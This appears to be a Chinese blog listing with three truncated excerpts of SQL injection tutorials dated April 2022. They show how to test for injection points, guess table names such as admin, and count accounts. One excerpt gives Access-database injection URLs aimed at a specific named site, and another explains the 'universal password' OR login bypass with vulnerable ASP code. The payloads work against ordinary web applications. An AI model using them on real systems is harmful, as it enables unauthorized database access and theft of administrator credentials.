2022年04月20日
1.判断有无注入点' ; and 1=1 and 1=22.猜表一般的表的名称无非是admin adminuser user pass password 等..and 0(select count(*) from *)and 0(select count(*) from admin) ---判断是否存在admin这张表3.猜帐号数目 如果遇到0˂ 返回正确页面 1˂返回错误页面说明帐号数目就是1个and 0˂(select count(*) from admin)and 1˂(sel
2022年04月20日
ACCESS 查询数据库类型 http://www.zengke.com/product.asp?sort_id=24 and exists (select * from sysobjects) 查询表admin页面返回正常显示为有,错误为无。 http://www.zengke.com//product.asp?sort_id=24 and exists (select * from admin) 查询admin表中的项admin /product.asp?sort_id=24 and exi
2022年04月20日
对于过滤了单引号或者做了post防注入的 站点,此方法也无能为力了;但对于很多对登陆端没做处理的网站,此方法值得一试,尤其是你已经知道源码了却不能执行命令(ACCESS数据库)或者对方能 报错( MYSQL数据库)。 首先我们回顾下老的万能密码or漏洞的实现机制,先帖一段asp源码: ---------------------------老的存在or漏洞的asp代码---------------------------------------- 复制代码代码如下:username = reque